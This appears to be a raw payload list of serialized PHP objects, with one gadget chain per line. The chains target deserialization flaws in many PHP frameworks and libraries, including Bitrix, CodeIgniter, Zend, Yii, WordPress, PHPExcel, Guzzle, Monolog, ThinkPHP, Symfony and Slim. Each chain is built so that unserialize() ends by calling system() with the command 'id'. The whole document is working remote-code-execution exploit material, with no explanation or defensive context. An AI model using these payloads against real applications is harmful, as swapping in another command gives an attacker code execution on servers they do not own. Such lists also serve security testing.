O:27:"Bitrix\Main\ORM\Data\Result":3:{s:9:"*errors";O:27:"Bitrix\Main\Type\Dictionary":1:{s:9:"*values";a:1:{i:0;O:17:"Bitrix\Main\Error":1:{s:10:"*message";O:36:"Bitrix\Main\UI\Viewer\ItemAttributes":1:{s:13:"*attributes";O:29:"Bitrix\Main\DB\ResultIterator":3:{s:38:"Bitrix\Main\DB\ResultIteratorcounter";i:0;s:42:"Bitrix\Main\DB\ResultIteratorcurrentData";i:0;s:37:"Bitrix\Main\DB\ResultIteratorresult";O:26:"Bitrix\Main\DB\ArrayResult":2:{s:11:"*resource";a:2:{i:0;a:1:{i:0;s:2:"id";}i:1;a:1:{i:0;a:1:{i:0;s:3:"rce";}}}s:13:"*converters";a:2:{i:0;s:6:"system";i:1;s:17:"WriteFinalMessage";}}}}}}}s:12:"*isSuccess";b:0;s:20:"*wereErrorsChecked";b:0;}
ORM\Table":1:{s:13:"*_behaviors";O:25:"Cake\ORM\BehaviorRegistry":2:{s:13:"*_methodMap";a:1:{s:12:"readandwrite";a:2:{i:0;s:2:"mb";i:1;s:5:"fetch";}}s:10:"*_loaded";a:1:{s:2:"mb";O:41:"Cake\Database\Statement\CallbackStatement":2:{s:12:"*_callback";s:6:"system";s:13:"*_statement";O:41:"Cake\Database\Statement\BufferedStatement":3:{s:14:"*_allFetched";i:1;s:9:"*buffer";a:1:{i:0;s:2:"id";}s:8:"*index";i:0;}}}}}s:41:"Symfony\Component\Process\Processstatus";s:7:"started";s:42:"Symfony\Component\Process\Processprocess";i:1;}
O:39:"CodeIgniter\Cache\Handlers\RedisHandler":1:{s:8:"*redis";O:45:"CodeIgniter\Session\Handlers\MemcachedHandler":2:{s:12:"*memcached";O:17:"CodeIgniter\Model":8:{s:10:"*builder";O:32:"CodeIgniter\Database\BaseBuilder":2:{s:6:"QBFrom";a:1:{i:0;s:2:"()";}s:2:"db";O:38:"CodeIgniter\Database\MySQLi\Connection":0:{}}s:13:"*primaryKey";N;s:15:"*beforeDelete";a:1:{i:0;s:8:"validate";}s:18:"*validationRules";a:1:{s:4:"id.x";a:1:{s:5:"rules";a:2:{i:0;s:6:"system";i:1;s:2:"dd";}}}s:13:"*validation";O:33:"CodeIgniter\Validation\Validation":1:{s:15:"*ruleSetFiles";a:1:{i:0;s:5:"finfo";}}s:21:"*tempAllowCallbacks";i:1;s:2:"db";O:38:"CodeIgniter\Database\MySQLi\Connection":0:{}s:20:"cleanValidationRules";b:0;}s:10:"*lockKey";a:1:{s:1:"x";s:2:"id";}}}
O:39:"CodeIgniter\Cache\Handlers\RedisHandler":1:{s:8:"*redis";O:20:"Faker\ValidGenerator":3:{s:12:"*generator";O:22:"Faker\DefaultGenerator":1:{s:10:"*default";s:2:"id";}s:12:"*validator";s:6:"system";s:13:"*maxRetries";i:1;}}
O:39:"CodeIgniter\Cache\Handlers\RedisHandler":1:{s:8:"*redis";O:45:"CodeIgniter\Session\Handlers\MemcachedHandler":2:{s:12:"*memcached";O:17:"CodeIgniter\Model":5:{s:10:"*builder";O:32:"CodeIgniter\Database\BaseBuilder":0:{}s:13:"*primaryKey";N;s:15:"*beforeDelete";a:1:{i:0;s:8:"validate";}s:18:"*validationRules";a:1:{s:2:"id";a:1:{i:0;s:6:"system";}}s:13:"*validation";O:33:"CodeIgniter\Validation\Validation":1:{s:15:"*ruleSetFiles";a:1:{i:0;s:5:"finfo";}}}s:10:"*lockKey";s:2:"id";}}
O:34:"Predis\Connection\StreamConnection":1:{s:13:"*parameters";O:25:"CodeIgniter\Entity\Entity":1:{s:10:"*datamap";a:1:{s:10:"persistent";O:40:"Symfony\Component\HttpFoundation\Request":2:{s:6:"server";O:61:"Symfony\Component\DependencyInjection\Argument\ServiceLocator":2:{s:73:"Symfony\Component\DependencyInjection\Argument\ServiceLocatorserviceMap";a:1:{s:14:"REQUEST_METHOD";a:2:{i:0;s:6:"system";i:1;s:2:"id";}}s:70:"Symfony\Component\DependencyInjection\Argument\ServiceLocatorfactory";s:14:"call_user_func";}s:7:"cookies";a:1:{s:3:"key";s:5:"value";}}}}}
O:34:"Predis\Response\Iterator\MultiBulk":3:{s:11:"*position";i:0;s:7:"*size";i:1;s:46:"Predis\Response\Iterator\MultiBulkconnection";O:20:"Faker\ValidGenerator":3:{s:12:"*generator";O:22:"Faker\DefaultGenerator":1:{s:10:"*default";s:2:"id";}s:13:"*maxRetries";i:1;s:12:"*validator";s:6:"system";}}
O:33:"Zend\Cache\Storage\Adapter\Memory":2:{s:15:"*eventHandles";a:1:{i:0;i:1;}s:9:"*events";O:30:"Zend\View\Renderer\PhpRenderer":1:{s:41:"Zend\View\Renderer\PhpRenderer__helpers";O:37:"Zend\Tag\Cloud\DecoratorPluginManager":4:{s:17:"*canonicalNames";a:2:{s:6:"detach";s:5:"cname";s:5:"cname";s:3:"any";}s:19:"*invokableClasses";a:1:{s:5:"cname";s:37:"Zend\Tag\Cloud\DecoratorPluginManager";}s:34:"*retrieveFromPeeringManagerFirst";b:0;s:15:"*initializers";a:1:{i:0;O:23:"Zend\Filter\FilterChain":1:{s:10:"*filters";O:13:"SplFixedArray":2:{i:0;a:2:{i:0;O:14:"Zend\Json\Expr":1:{s:13:"*expression";s:2:"id";}i:1;s:10:"__toString";}i:1;s:6:"system";}}}}}}
O:15:"Zend\Log\Logger":1:{s:10:"*writers";a:1:{i:0;O:20:"Zend\Log\Writer\Mail":3:{s:15:"*eventsToMail";a:1:{i:0;i:0;}s:21:"*subjectPrependText";s:0:"";s:24:"*numEntriesPerPriority";a:1:{i:0;O:14:"Zend\Tag\Cloud":2:{s:7:"*tags";a:1:{i:0;s:0:"";}s:15:"*tagDecorator";O:34:"Zend\Tag\Cloud\Decorator\HtmlCloud":3:{s:12:"*separator";s:0:"";s:10:"*escaper";O:20:"Zend\Escaper\Escaper":1:{s:18:"*htmlAttrMatcher";a:2:{i:0;O:23:"Zend\Filter\FilterChain":1:{s:10:"*filters";O:13:"SplFixedArray":2:{i:0;a:2:{i:0;O:14:"Zend\Json\Expr":1:{s:13:"*expression";s:2:"id";}i:1;s:10:"__toString";}i:1;s:6:"system";}}i:1;s:6:"filter";}}s:11:"*htmlTags";a:1:{s:1:"h";a:1:{s:1:"a";s:1:"!";}}}}}}}}
O:17:"Zend_Form_Element":31:{s:8:"*_name";s:6:"system";s:14:"*_decorators";a:1:{i:0;O:24:"Zend_Form_Decorator_Form":5:{s:13:"*_placement";s:6:"APPEND";s:11:"*_element";N;s:11:"*_options";a:0:{}s:13:"*_separator";s:1:"
";s:10:"*_helper";s:4:"call";}}s:8:"*_view";O:28:"Zend_Cache_Frontend_Function":1:{s:19:"*_specificOptions";a:3:{s:16:"cache_by_default";b:0;s:16:"cached_functions";a:0:{}s:20:"non_cached_functions";a:0:{}}}s:2:"id";s:2:"id";s:6:"helper";s:8:"formText";s:14:"*_allowEmpty";b:1;s:31:"*_autoInsertNotEmptyValidator";b:1;s:13:"*_belongsTo";N;s:15:"*_description";N;s:32:"*_disableLoadDefaultDecorators";b:0;s:17:"*_errorMessages";a:0:{}s:10:"*_errors";a:0:{}s:25:"*_errorMessageSeparator";s:2:"; ";s:11:"*_filters";a:0:{}s:10:"*_ignore";b:0;s:11:"*_isArray";b:0;s:11:"*_isError";b:0;s:17:"*_isErrorForced";b:0;s:9:"*_label";N;s:11:"*_loaders";a:0:{}s:12:"*_messages";a:0:{}s:9:"*_order";N;s:12:"*_required";b:0;s:14:"*_translator";N;s:22:"*_translatorDisabled";b:0;s:8:"*_type";N;s:14:"*_validators";a:0:{}s:18:"*_validatorRules";a:0:{}s:9:"*_value";N;s:22:"*_isPartialRendering";b:0;s:34:"*_concatJustValuesInErrorMessage";b:0;}
O:23:"yii\db\BatchQueryResult":1:{s:36:"yii\db\BatchQueryResult_dataReader";O:17:"yii\db\Connection":2:{s:3:"pdo";i:1;s:3:"dsn";O:26:"yii\db\ColumnSchemaBuilder":2:{s:7:"*type";s:1:"x";s:11:"categoryMap";O:22:"yii\caching\ArrayCache":2:{s:10:"serializer";a:1:{i:1;s:6:"system";}s:30:"yii\caching\ArrayCache_cache";a:1:{s:1:"x";a:2:{i:0;s:2:"id";i:1;i:0;}}}}}}
O:15:"WikiPublishTask":1:{s:28:"WikiPublishTaskcookiesFile";O:39:"Prophecy\Argument\Token\ExactValueToken":2:{s:45:"Prophecy\Argument\Token\ExactValueTokenutil";O:44:"PHPUnit_Extensions_Selenium2TestCase_Session":3:{s:11:"*commands";a:1:{s:9:"stringify";s:6:"system";}s:6:"*url";O:40:"PHPUnit_Extensions_Selenium2TestCase_URL":0:{}s:9:"*driver";O:23:"DocBlox_Parallel_Worker":0:{}}s:46:"Prophecy\Argument\Token\ExactValueTokenvalue";s:2:"id";}}
O:11:"CDbCriteria":1:{s:6:"params";O:12:"CMapIterator":3:{s:16:"CMapIterator_d";O:10:"CFileCache":7:{s:9:"keyPrefix";s:0:"";s:7:"hashKey";b:0;s:10:"serializer";a:1:{i:1;s:6:"system";}s:9:"cachePath";s:10:"data:text/";s:14:"directoryLevel";i:0;s:11:"embedExpiry";b:1;s:15:"cacheFileSuffix";s:24:";base64,OTk5OTk5OTk5OWlk";}s:19:"CMapIterator_keys";a:1:{i:0;i:0;}s:18:"CMapIterator_key";i:0;}}
O:13:"WP_HTML_Token":2:{s:13:"bookmark_name";s:2:"id";s:10:"on_destroy";s:6:"system";}
O:8:"WP_Theme":2:{s:7:"headers";O:13:"WP_Block_List":2:{s:6:"blocks";a:1:{s:4:"Name";a:1:{s:9:"blockName";s:12:"Parent Theme";}}s:8:"registry";O:22:"WP_Block_Type_Registry":1:{s:22:"registered_block_types";O:8:"WP_Theme":2:{s:7:"headers";N;s:6:"parent";O:22:"WpOrg\Requests\Session":3:{s:3:"url";s:10:"http://p:0";s:7:"headers";a:1:{i:0;s:2:"id";}s:7:"options";a:1:{s:5:"hooks";O:20:"WpOrg\Requests\Hooks":1:{s:5:"hooks";a:1:{s:23:"requests.before_request";a:1:{i:0;a:1:{i:0;a:2:{i:0;O:20:"WpOrg\Requests\Hooks":1:{s:5:"hooks";a:1:{s:15:"http://p:0/Name";a:1:{i:0;a:1:{i:0;s:6:"system";}}}}i:1;s:8:"dispatch";}}}}}}}}}}s:6:"parent";N;}
O:25:"PHPExcel_Shared_XMLWriter":1:{s:40:"PHPExcel_Shared_XMLWriter_tempFileName";O:17:"PHPExcel_RichText":1:{s:36:"PHPExcel_RichText_richTextElements";O:33:"Requests_Utility_FilteredIterator":4:{i:0;i:0;i:1;a:1:{i:0;s:2:"id";}i:2;a:1:{s:11:"*callback";s:6:"system";}i:3;N;}}}
O:25:"PHPExcel_Shared_XMLWriter":1:{s:39:"PHPExcel_Shared_XMLWritertempFileName";O:17:"PHPExcel_RichText":1:{s:35:"PHPExcel_RichTextrichTextElements";O:33:"Requests_Utility_FilteredIterator":4:{i:0;i:0;i:1;a:1:{i:0;s:2:"id";}i:2;a:1:{s:11:"*callback";s:6:"system";}i:3;N;}}}
O:37:"PHPExcel_CachedObjectStorage_DiscISAM":2:{s:48:"PHPExcel_CachedObjectStorage_DiscISAM_fileName";O:17:"PHPExcel_RichText":1:{s:36:"PHPExcel_RichText_richTextElements";O:33:"Requests_Utility_FilteredIterator":4:{i:0;i:0;i:1;a:1:{i:0;s:2:"id";}i:2;a:1:{s:11:"*callback";s:6:"system";}i:3;N;}}s:50:"PHPExcel_CachedObjectStorage_DiscISAM_fileHandle";i:42;}
O:37:"PHPExcel_CachedObjectStorage_DiscISAM":2:{s:47:"PHPExcel_CachedObjectStorage_DiscISAMfileName";O:17:"PHPExcel_RichText":1:{s:35:"PHPExcel_RichTextrichTextElements";O:33:"Requests_Utility_FilteredIterator":4:{i:0;i:0;i:1;a:1:{i:0;s:2:"id";}i:2;a:1:{s:11:"*callback";s:6:"system";}i:3;N;}}s:49:"PHPExcel_CachedObjectStorage_DiscISAMfileHandle";i:42;}
O:17:"PHPExcel_RichText":1:{s:36:"PHPExcel_RichText_richTextElements";O:33:"Requests_Utility_FilteredIterator":4:{i:0;i:0;i:1;a:1:{i:0;s:2:"id";}i:2;a:1:{s:11:"*callback";s:6:"system";}i:3;N;}}
O:17:"PHPExcel_RichText":1:{s:35:"PHPExcel_RichTextrichTextElements";O:33:"Requests_Utility_FilteredIterator":4:{i:0;i:0;i:1;a:1:{i:0;s:2:"id";}i:2;a:1:{s:11:"*callback";s:6:"system";}i:3;N;}}
O:33:"Requests_Utility_FilteredIterator":4:{i:0;i:0;i:1;a:1:{i:0;s:2:"id";}i:2;a:1:{s:11:"*callback";s:6:"system";}i:3;N;}
O:9:"WC_Logger":1:{s:19:"WC_Logger_handles";O:33:"Requests_Utility_FilteredIterator":4:{i:0;i:0;i:1;a:1:{i:0;s:2:"id";}i:2;a:1:{s:11:"*callback";s:6:"system";}i:3;N;}}
O:19:"WC_Log_Handler_File":1:{s:10:"*handles";O:33:"Requests_Utility_FilteredIterator":4:{i:0;i:0;i:1;a:1:{i:0;s:2:"id";}i:2;a:1:{s:11:"*callback";s:6:"system";}i:3;N;}}
O:20:"EVF_Log_Handler_File":1:{s:10:"*handles";O:33:"Requests_Utility_FilteredIterator":4:{i:0;i:0;i:1;a:1:{i:0;s:2:"id";}i:2;a:1:{s:11:"*callback";s:6:"system";}i:3;N;}}
O:19:"IG_Log_Handler_File":1:{s:10:"*handles";O:33:"Requests_Utility_FilteredIterator":4:{i:0;i:0;i:1;a:1:{i:0;s:2:"id";}i:2;a:1:{s:11:"*callback";s:6:"system";}i:3;N;}}
O:31:"GuzzleHttp\Cookie\FileCookieJar":1:{s:41:"GuzzleHttp\Cookie\FileCookieJarfilename";O:27:"GuzzleHttp\Cookie\SetCookie":1:{s:33:"GuzzleHttp\Cookie\SetCookiedata";O:33:"Requests_Utility_FilteredIterator":4:{i:0;i:0;i:1;a:2:{s:4:"Name";s:2:"id";s:5:"Value";s:0:"";}i:2;a:1:{s:11:"*callback";s:6:"system";}i:3;N;}}}
O:27:"GuzzleHttp\Cookie\SetCookie":1:{s:33:"GuzzleHttp\Cookie\SetCookiedata";O:33:"Requests_Utility_FilteredIterator":4:{i:0;i:0;i:1;a:2:{s:4:"Name";s:2:"id";s:5:"Value";s:0:"";}i:2;a:1:{s:11:"*callback";s:6:"system";}i:3;N;}}
O:19:"Dompdf\Adapter\CPDF":1:{s:33:"Dompdf\Adapter\CPDF_image_cache";O:33:"Requests_Utility_FilteredIterator":4:{i:0;i:0;i:1;a:1:{i:0;s:2:"id";}i:2;a:1:{s:11:"*callback";s:6:"system";}i:3;N;}}
O:19:"Dompdf\Adapter\CPDF":1:{s:15:"*_image_cache";O:33:"Requests_Utility_FilteredIterator":4:{i:0;i:0;i:1;a:1:{i:0;s:2:"id";}i:2;a:1:{s:11:"*callback";s:6:"system";}i:3;N;}}
a:2:{i:0;O:27:"googlelogin_vendor_autoload":0:{}i:1;O:32:"Monolog\Handler\SyslogUdpHandler":1:{s:9:"*socket";O:29:"Monolog\Handler\BufferHandler":7:{s:10:"*handler";r:4;s:13:"*bufferSize";i:-1;s:9:"*buffer";a:1:{i:0;a:2:{i:0;s:2:"id";s:5:"level";N;}}s:8:"*level";N;s:14:"*initialized";b:1;s:14:"*bufferLimit";i:-1;s:13:"*processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}}
O:17:"think\model\Pivot":9:{s:19:"think\Modelexists";b:1;s:18:"think\Modelforce";b:1;s:21:"think\ModellazySave";b:1;s:9:"*suffix";O:17:"think\model\Pivot":9:{s:19:"think\Modelexists";N;s:18:"think\Modelforce";N;s:21:"think\ModellazySave";N;s:9:"*suffix";N;s:17:"think\Modeldata";a:1:{s:3:"key";a:1:{s:3:"key";s:2:"id";}}s:21:"think\ModelwithAttr";a:1:{s:3:"key";a:1:{s:3:"key";s:6:"system";}}s:7:"*json";a:1:{i:0;s:3:"key";}s:12:"*jsonAssoc";b:1;s:12:"*withEvent";N;}s:17:"think\Modeldata";a:1:{s:3:"key";a:1:{s:3:"key";s:2:"id";}}s:21:"think\ModelwithAttr";N;s:7:"*json";N;s:12:"*jsonAssoc";N;s:12:"*withEvent";b:0;}
O:41:"League\Flysystem\Cached\Storage\Psr6Cache":3:{s:47:"League\Flysystem\Cached\Storage\Psr6Cachepool";O:26:"League\Flysystem\Directory":2:{s:13:"*filesystem";O:26:"League\Flysystem\Directory":2:{s:13:"*filesystem";O:14:"think\Validate":1:{s:7:"*type";a:1:{s:3:"key";s:6:"system";}}s:7:"*path";s:2:"id";}s:7:"*path";s:3:"key";}s:11:"*autosave";b:0;s:6:"*key";a:1:{i:0;s:8:"anything";}}
O:27:"think\process\pipes\Windows":1:{s:34:"think\process\pipes\Windowsfiles";a:1:{i:0;O:17:"think\model\Pivot":5:{s:9:"*append";a:1:{i:0;s:8:"getError";}s:8:"*error";O:27:"think\model\relation\HasOne":3:{s:15:"*selfRelation";b:0;s:8:"*query";O:14:"think\db\Query":1:{s:8:"*model";O:20:"think\console\Output":2:{s:28:"think\console\Outputhandle";O:30:"think\session\driver\Memcached":2:{s:10:"*handler";O:27:"think\cache\driver\Memcache":3:{s:10:"*options";a:5:{s:6:"expire";i:0;s:12:"cache_subdir";b:0;s:6:"prefix";s:0:"";s:4:"path";s:0:"";s:13:"data_compress";b:0;}s:10:"*handler";O:13:"think\Request":2:{s:6:"*get";a:1:{s:18:"HEXENS<getAttr>no<";s:2:"id";}s:9:"*filter";s:6:"system";}s:6:"*tag";b:1;}s:9:"*config";a:7:{s:4:"host";s:9:"127.0.0.1";s:4:"port";i:11211;s:6:"expire";i:3600;s:7:"timeout";i:0;s:12:"session_name";s:6:"HEXENS";s:8:"username";s:0:"";s:8:"password";s:0:"";}}s:9:"*styles";a:1:{i:0;s:7:"getAttr";}}}s:11:"*bindAttr";a:2:{i:0;s:2:"no";i:1;s:3:"123";}}s:9:"*parent";O:20:"think\console\Output":2:{s:28:"think\console\Outputhandle";O:30:"think\session\driver\Memcached":2:{s:10:"*handler";O:27:"think\cache\driver\Memcache":3:{s:10:"*options";a:5:{s:6:"expire";i:0;s:12:"cache_subdir";b:0;s:6:"prefix";s:0:"";s:4:"path";s:0:"";s:13:"data_compress";b:0;}s:10:"*handler";O:13:"think\Request":2:{s:6:"*get";a:1:{s:18:"HEXENS<getAttr>no<";s:2:"id";}s:9:"*filter";s:6:"system";}s:6:"*tag";b:1;}s:9:"*config";a:7:{s:4:"host";s:9:"127.0.0.1";s:4:"port";i:11211;s:6:"expire";i:3600;s:7:"timeout";i:0;s:12:"session_name";s:6:"HEXENS";s:8:"username";s:0:"";s:8:"password";s:0:"";}}s:9:"*styles";a:1:{i:0;s:7:"getAttr";}}s:15:"*selfRelation";b:0;s:8:"*query";O:14:"think\db\Query":1:{s:8:"*model";O:20:"think\console\Output":2:{s:28:"think\console\Outputhandle";O:30:"think\session\driver\Memcached":2:{s:10:"*handler";O:27:"think\cache\driver\Memcache":3:{s:10:"*options";a:5:{s:6:"expire";i:0;s:12:"cache_subdir";b:0;s:6:"prefix";s:0:"";s:4:"path";s:0:"";s:13:"data_compress";b:0;}s:10:"*handler";O:13:"think\Request":2:{s:6:"*get";a:1:{s:18:"HEXENS<getAttr>no<";s:2:"id";}s:9:"*filter";s:6:"system";}s:6:"*tag";b:1;}s:9:"*config";a:7:{s:4:"host";s:9:"127.0.0.1";s:4:"port";i:11211;s:6:"expire";i:3600;s:7:"timeout";i:0;s:12:"session_name";s:6:"HEXENS";s:8:"username";s:0:"";s:8:"password";s:0:"";}}s:9:"*styles";a:1:{i:0;s:7:"getAttr";}}}}}}
O:27:"think\process\pipes\Windows":1:{s:34:"think\process\pipes\Windowsfiles";a:1:{i:0;O:17:"think\model\Pivot":3:{s:17:"think\Modeldata";a:1:{s:5:"smi1e";s:2:"id";}s:21:"think\ModelwithAttr";a:1:{s:5:"smi1e";s:6:"system";}s:9:"*append";a:1:{s:5:"smi1e";s:1:"1";}}}}
C:27:"sfNamespacedParameterHolder":113:{O:29:"sfOutputEscaperArrayDecorator":2:{s:8:"*value";a:1:{i:0;s:2:"id";}s:17:"*escapingMethod";s:6:"system";}}
O:15:"MySQLiTableInfo":15:{s:7:"*name";N;s:10:"*columns";O:29:"sfOutputEscaperArrayDecorator":2:{s:8:"*value";a:1:{i:0;s:2:"id";}s:17:"*escapingMethod";s:6:"system";}s:14:"*foreignKeys";a:0:{}s:10:"*indexes";a:0:{}s:13:"*primaryKey";N;s:11:"*pkLoaded";b:0;s:12:"*fksLoaded";b:0;s:16:"*indexesLoaded";b:0;s:13:"*colsLoaded";b:0;s:15:"*vendorLoaded";b:0;s:21:"*vendorSpecificInfo";a:0:{}s:7:"*conn";N;s:11:"*database";N;s:9:"*dblink";N;s:9:"*dbname";N;}
O:14:"PropelDateTime":5:{s:4:"date";s:26:"2025-05-12 10:25:44.810131";s:13:"timezone_type";i:3;s:8:"timezone";s:3:"UTC";s:26:"PropelDateTimedateString";N;s:24:"PropelDateTimetzString";O:30:"sfOutputEscaperObjectDecorator":2:{s:8:"*value";O:13:"sfCultureInfo":8:{s:14:"*dataFileExt";s:4:".dat";s:7:"*data";a:0:{}s:10:"*culture";s:2:"id";s:10:"*dataDir";N;s:12:"*dataFiles";a:0:{}s:17:"*dateTimeFormat";N;s:15:"*numberFormat";N;s:13:"*properties";a:0:{}}s:17:"*escapingMethod";s:6:"system";}}
C:15:"sfDoctrinePager":113:{O:29:"sfOutputEscaperArrayDecorator":2:{s:8:"*value";a:1:{i:0;s:2:"id";}s:17:"*escapingMethod";s:6:"system";}}
O:27:"Swift_KeyCache_DiskKeyCache":2:{s:34:"Swift_KeyCache_DiskKeyCache_path";s:25:"thispathshouldneverexists";s:34:"Swift_KeyCache_DiskKeyCache_keys";O:29:"sfOutputEscaperArrayDecorator":2:{s:8:"*value";a:1:{i:1;s:2:"id";}s:17:"*escapingMethod";s:6:"system";}}
C:67:"Symfony\Component\Security\Core\Authentication\Token\AnonymousToken":536:{a:2:{i:0;N;i:1;O:51:"Symfony\Component\Validator\ConstraintViolationList":1:{s:63:"Symfony\Component\Validator\ConstraintViolationListviolations";O:50:"Symfony\Component\Finder\Iterator\SortableIterator":2:{s:60:"Symfony\Component\Finder\Iterator\SortableIteratoriterator";O:51:"Symfony\Component\Validator\ConstraintViolationList":1:{s:63:"Symfony\Component\Validator\ConstraintViolationListviolations";a:2:{i:0;s:6:"system";i:1;s:2:"id";}}s:56:"Symfony\Component\Finder\Iterator\SortableIteratorsort";s:14:"call_user_func";}}}}
O:37:"Symfony\Component\BrowserKit\Response":1:{s:46:"Symfony\Component\BrowserKit\Responseheaders";O:50:"Symfony\Component\Finder\Iterator\SortableIterator":2:{s:60:"Symfony\Component\Finder\Iterator\SortableIteratoriterator";O:11:"ArrayObject":4:{i:0;i:0;i:1;a:2:{i:0;s:6:"system";i:1;s:2:"id";}i:2;a:0:{}i:3;N;}s:56:"Symfony\Component\Finder\Iterator\SortableIteratorsort";s:14:"call_user_func";}}
O:44:"Symfony\Component\Process\Pipes\WindowsPipes":1:{s:57:"Symfony\Component\Process\Pipes\WindowsPipesfileHandles";O:50:"Symfony\Component\Finder\Iterator\SortableIterator":2:{s:60:"Symfony\Component\Finder\Iterator\SortableIteratoriterator";O:11:"ArrayObject":4:{i:0;i:0;i:1;a:2:{i:0;s:6:"system";i:1;s:2:"id";}i:2;a:0:{}i:3;N;}s:56:"Symfony\Component\Finder\Iterator\SortableIteratorsort";s:14:"call_user_func";}}
O:75:"Symfony\Component\DependencyInjection\Loader\Configurator\AliasConfigurator":1:{s:98:"Symfony\Component\DependencyInjection\Loader\Configurator\AbstractServiceConfiguratordefaultTags";O:66:"Symfony\Component\DependencyInjection\Argument\RewindableGenerator":1:{s:77:"Symfony\Component\DependencyInjection\Argument\RewindableGeneratorgenerator";a:2:{i:0;O:32:"Symfony\Component\Routing\Router":4:{s:10:"*matcher";N;s:10:"*context";a:1:{i:0;s:6:"system";}s:13:"*collection";O:13:"ArrayIterator":4:{i:0;i:0;i:1;a:1:{i:0;s:2:"id";}i:2;a:0:{}i:3;N;}s:10:"*options";a:2:{s:13:"matcher_class";s:55:"\Symfony\Component\Finder\Iterator\CustomFilterIterator";s:9:"cache_dir";N;}}i:1;s:10:"getMatcher";}}}
;s:6:"system";}
O:60:"Symfony\Component\HttpKernel\DataCollector\DumpDataCollector":7:{s:7:"*data";a:3:{i:0;a:4:{s:4:"data";s:1:"1";s:4:"name";O:40:"Symfony\Component\Form\FormErrorIterator":2:{s:4:"form";N;s:48:"Symfony\Component\Form\FormErrorIteratorerrors";a:1:{i:0;O:40:"Symfony\Component\Form\FormErrorIterator":2:{s:4:"form";O:41:"Symfony\Component\Cache\Traits\RedisProxy":2:{s:48:"Symfony\Component\Cache\Traits\RedisProxyredis";s:2:"id";s:54:"Symfony\Component\Cache\Traits\RedisProxyinitializer";O:39:"Symfony\Component\Console\Helper\Dumper":1:{s:48:"Symfony\Component\Console\Helper\Dumperhandler";a:2:{i:0;O:44:"Symfony\Component\Cache\Adapter\ProxyAdapter":3:{s:61:"Symfony\Component\Cache\Adapter\ProxyAdaptercreateCacheItem";s:2:"dd";s:55:"Symfony\Component\Cache\Adapter\ProxyAdapternamespace";s:0:"";s:50:"Symfony\Component\Cache\Adapter\ProxyAdapterpool";O:43:"Symfony\Component\Cache\Adapter\NullAdapter":1:{s:60:"Symfony\Component\Cache\Adapter\NullAdaptercreateCacheItem";s:6:"system";}}i:1;s:7:"getItem";}}}s:48:"Symfony\Component\Form\FormErrorIteratorerrors";a:0:{}}}}s:4:"file";s:1:"3";s:4:"line";s:1:"4";}i:1;N;i:2;N;}s:71:"Symfony\Component\HttpKernel\DataCollector\DumpDataCollectorstopwatch";N;s:76:"Symfony\Component\HttpKernel\DataCollector\DumpDataCollectorfileLinkFormat";N;s:71:"Symfony\Component\HttpKernel\DataCollector\DumpDataCollectordataCount";i:0;s:73:"Symfony\Component\HttpKernel\DataCollector\DumpDataCollectorisCollected";b:0;s:73:"Symfony\Component\HttpKernel\DataCollector\DumpDataCollectorclonesCount";i:0;s:73:"Symfony\Component\HttpKernel\DataCollector\DumpDataCollectorclonesIndex";i:0;}
O:47:"Symfony\Component\Cache\Adapter\TagAwareAdapter":2:{s:57:"Symfony\Component\Cache\Adapter\TagAwareAdapterdeferred";a:1:{i:0;O:33:"Symfony\Component\Cache\CacheItem":2:{s:11:"*poolHash";i:1;s:12:"*innerItem";s:2:"id";}}s:53:"Symfony\Component\Cache\Adapter\TagAwareAdapterpool";O:44:"Symfony\Component\Cache\Adapter\ProxyAdapter":2:{s:54:"Symfony\Component\Cache\Adapter\ProxyAdapterpoolHash";i:1;s:58:"Symfony\Component\Cache\Adapter\ProxyAdaptersetInnerItem";s:6:"system";}}
O:7:"App\App":1:{s:12:"*finalizer";O:21:"Spiral\Boot\Finalizer":1:{s:33:"Spiral\Boot\Finalizerfinalizers";a:1:{i:0;a:2:{i:0;O:20:"PhpOption\LazyOption":2:{s:30:"PhpOption\LazyOptioncallback";s:6:"system";s:31:"PhpOption\LazyOptionarguments";a:1:{i:0;s:2:"id";}}i:1;s:3:"get";}}}}
O:35:"Monolog\Handler\RotatingFileHandler":4:{s:13:"*mustRotate";b:1;s:11:"*filename";s:8:"anything";s:17:"*filenameFormat";O:30:"Spiral\Reactor\FileDeclaration":1:{s:42:"Spiral\Reactor\FileDeclarationdocComment";O:20:"PhpOption\LazyOption":2:{s:30:"PhpOption\LazyOptioncallback";s:6:"system";s:31:"PhpOption\LazyOptionarguments";a:1:{i:0;s:2:"id";}}}s:13:"*dateFormat";s:1:"l";}
O:18:"Slim\Http\Response":2:{s:10:"*headers";O:8:"Slim\App":1:{s:19:"Slim\Appcontainer";O:14:"Slim\Container":3:{s:21:"Pimple\Containerraw";a:1:{s:3:"all";a:2:{i:0;O:8:"Slim\App":1:{s:19:"Slim\Appcontainer";O:8:"Slim\App":1:{s:19:"Slim\Appcontainer";O:14:"Slim\Container":3:{s:21:"Pimple\Containerraw";a:1:{s:3:"has";s:6:"system";}s:24:"Pimple\Containervalues";a:1:{s:3:"has";s:6:"system";}s:22:"Pimple\Containerkeys";a:1:{s:3:"has";s:6:"system";}}}}i:1;s:2:"id";}}s:24:"Pimple\Containervalues";a:1:{s:3:"all";a:2:{i:0;O:8:"Slim\App":1:{s:19:"Slim\Appcontainer";O:8:"Slim\App":1:{s:19:"Slim\Appcontainer";O:14:"Slim\Container":3:{s:21:"Pimple\Containerraw";a:1:{s:3:"has";s:6:"system";}s:24:"Pimple\Containervalues";a:1:{s:3:"has";s:6:"system";}s:22:"Pimple\Containerkeys";a:1:{s:3:"has";s:6:"system";}}}}i:1;s:2:"id";}}s:22:"Pimple\Containerkeys";a:1:{s:3:"all";a:2:{i:0;O:8:"Slim\App":1:{s:19:"Slim\Appcontainer";O:8:"Slim\App":1:{s:19:"Slim\Appcontainer";O:14:"Slim\Container":3:{s:21:"Pimple\Containerraw";a:1:{s:3:"has";s:6:"system";}s:24:"Pimple\Containervalues";a:1:{s:3:"has";s:6:"system";}s:22:"Pimple\Containerkeys";a:1:{s:3:"has";s:6:"system";}}}}i:1;s:2:"id";}}}}s:7:"*body";s:0:"";}
